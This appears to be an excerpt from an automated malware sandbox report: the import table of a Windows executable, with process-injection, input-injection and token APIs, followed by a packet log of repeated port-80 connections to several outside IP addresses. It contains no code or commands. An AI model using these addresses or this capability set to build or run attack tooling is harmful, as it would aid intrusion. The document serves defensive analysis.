WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Jul 3, 2024 17:35:23.042732000 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.042815924 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.042857885 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.043215990 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.043272972 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.043576002 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.043633938 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:24.036623955 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:24.045949936 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:24.045962095 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:24.046207905 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:24.046207905 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:24.205694914 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:24.205925941 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:25.065705061 CEST4977780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:25.234958887 CEST8049777142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:25.235218048 CEST4977780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:25.248404980 CEST4977780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:25.417593002 CEST8049777142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:26.419451952 CEST8049777142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:26.419527054 CEST8049777142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:26.419915915 CEST4977780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:26.426525116 CEST4977780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:26.595648050 CEST8049777142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:31.633918047 CEST4977880192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:31.765469074 CEST804977874.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:31.765652895 CEST4977880192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:31.783313990 CEST4977880192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:31.914894104 CEST804977874.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:31.921339989 CEST804977874.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:31.921499014 CEST804977874.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:31.921668053 CEST4977880192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:33.300287008 CEST4977880192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:34.329363108 CEST4977980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:34.462241888 CEST804977974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:34.462459087 CEST4977980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:34.479335070 CEST4977980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:34.612229109 CEST804977974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:34.617757082 CEST804977974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:34.617839098 CEST804977974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:34.618031025 CEST4977980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:35.987293959 CEST4977980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.016534090 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.148089886 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.148288965 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.165724993 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.165774107 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.297372103 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297429085 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297465086 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297493935 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297522068 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297553062 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297622919 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.297801971 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.297959089 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.429321051 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429403067 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429457903 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429503918 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429549932 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429598093 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429631948 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.429646015 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429706097 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429760933 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429816961 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429821968 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.429868937 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429915905 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429929018 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.429966927 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.430011988 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.430057049 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561655045 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561714888 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561810017 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561851978 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561891079 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561937094 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561980963 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.562021971 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.562061071 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.562099934 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.562186003 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.565179110 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.565257072 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.565556049 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:38.674160957 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:39.703495026 CEST4978180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:39.835195065 CEST804978174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:39.835442066 CEST4978180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:39.849237919 CEST4978180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:39.980788946 CEST804978174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:39.987484932 CEST804978174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:39.988301992 CEST804978174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:39.988552094 CEST4978180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:39.995572090 CEST4978180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:40.127212048 CEST804978174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:45.237443924 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:45.355931044 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.356110096 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:45.371922016 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:45.490511894 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.512809992 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.512824059 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.512842894 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.513025999 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:45.520230055 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.520342112 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:46.877832890 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:47.906362057 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:48.024961948 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.025104046 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:48.040883064 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:48.159491062 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.180605888 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.180619955 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.180629969 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.180898905 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:48.188020945 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.188232899 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:49.546717882 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.576200008 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.695661068 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.695823908 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.712764978 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.712826014 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.712877035 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.831757069 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.831831932 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.831880093 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.831909895 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.831945896 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.831979990 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.832015038 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.832034111 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.832051039 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.832086086 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.832091093 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.832122087 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.832134008 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.832324982 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.950745106 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.950772047 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.950910091 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.950958014 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.951003075 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.951025009 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951047897 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951066017 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951141119 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951302052 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951318979 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951332092 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951442957 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951555014 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951572895 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951585054 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951597929 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951631069 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951643944 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951662064 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.951761961 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951911926 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.952002048 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.069515944 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.069608927 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.069736004 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.069760084 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070180893 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070302963 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070314884 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070400000 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070410013 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070417881 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070425034 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070432901 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.092320919 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.092334032 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.092483997 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.092643023 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:51.092643023 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:51.096856117 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.097033024 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:52.217983007 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.247456074 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.365984917 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.366111994 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.379725933 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.498301983 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.523156881 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.523170948 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.523247957 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.523474932 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.523474932 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.528054953 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.528219938 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.530147076 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.648566961 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:58.700110912 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:35:59.715132952 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:01.714716911 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:05.729422092 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:13.743350029 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:20.789040089 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:21.804079056 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:23.819293022 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:27.834007025 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:35.847897053 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:42.892750978 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:43.893053055 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:45.908222914 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:49.922975063 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:57.936863899 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:37:53.387984991 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.388004065 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388016939 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388113976 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.388143063 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.388780117 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388793945 CEST804979466.235.200.145192.168.11.20
